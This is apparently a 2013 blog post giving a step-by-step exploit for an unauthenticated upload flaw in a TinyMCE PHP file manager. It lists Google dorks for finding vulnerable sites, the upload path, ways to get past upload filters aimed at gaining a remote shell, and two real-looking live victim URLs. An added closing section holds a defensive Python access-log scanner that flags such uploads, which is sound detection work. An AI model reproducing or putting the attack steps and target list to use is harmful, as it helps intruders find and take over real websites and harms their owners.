Saturday, October 19, 2013

TinyMCE PHP File Manager, Remote File Upload Vulnerability

By Unknown


Title : TinyMCE PHP File Manager, Remote File Upload Vulnerability
Server : Linux
Author : NoentryPHC
Type : Webapp exploit
Harm : Remote shell upload
Dork : inurl:/file_manager.php?type=img

Go to google.com and search for the dorks inurl:/file_manager.php?type=img and inurl:/file_manager.php?type=file to find vulnerable websites. To get more sites, you can modify the dork.
Exploit path : http://www.site.com/directory/tinymce/file_manager.php?type=file
So go to http://www.site.com/directory/tinymce/file_manager.php?type=file and upload your file there.
If PHP and HTML uploads are denied, you can try Tamper Data and Live HTTP Headers.
Live demo :
http://piter-ka.ru/media/tinymce/file_manager.php?type=file
http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img
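
From the defending side, the requests described above leave a recognisable trail in the web server access log. The following added example (not part of the original post) scans Combined Log Format lines for POSTs to `file_manager.php?type=img|file` and for script-type files fetched afterwards by the same client; the log lines, IP addresses and the `/directory/uploads/` path are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Extensions a web server may execute or render (the post mentions PHP and HTML).
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|html?)$', re.I)

# Constructed sample log; IPs are documentation ranges, /directory/uploads/ is assumed.
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Oct/2013:10:01:02 +0000] "GET /directory/tinymce/file_manager.php?type=file HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Oct/2013:10:01:40 +0000] "POST /directory/tinymce/file_manager.php?type=file HTTP/1.1" 200 731 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Oct/2013:10:02:05 +0000] "GET /directory/uploads/notes.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Oct/2013:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Oct/2013:10:04:00 +0000] "POST /directory/tinymce/file_manager.php?type=img HTTP/1.1" 403 210 "-" "Mozilla/5.0"',
]

def review(lines):
    """Return (line_number, reason) findings for file_manager.php upload activity."""
    findings, uploaders = [], set()
    for number, line in enumerate(lines, 1):
        match = LINE_RE.match(line)
        if not match:
            continue  # not Combined Log Format, skip
        ip, method, target, status = match.groups()
        url = urlsplit(target)
        if url.path.lower().endswith("/file_manager.php"):
            kind = parse_qs(url.query).get("type", [""])[0]
            if method.upper() == "POST" and kind in ("img", "file"):
                findings.append((number, f"{ip} POST upload type={kind} status={status}"))
                if int(status) < 400:
                    uploaders.add(ip)  # the server accepted this request
        elif ip in uploaders and status == "200" and SCRIPT_EXT.search(url.path):
            findings.append((number, f"{ip} fetched {url.path} after uploading"))
    return findings

if __name__ == "__main__":
    for number, reason in review(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

Any finding for an upload the site owner did not make means the file manager is reachable from outside, and the upload directory should be inspected on disk.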
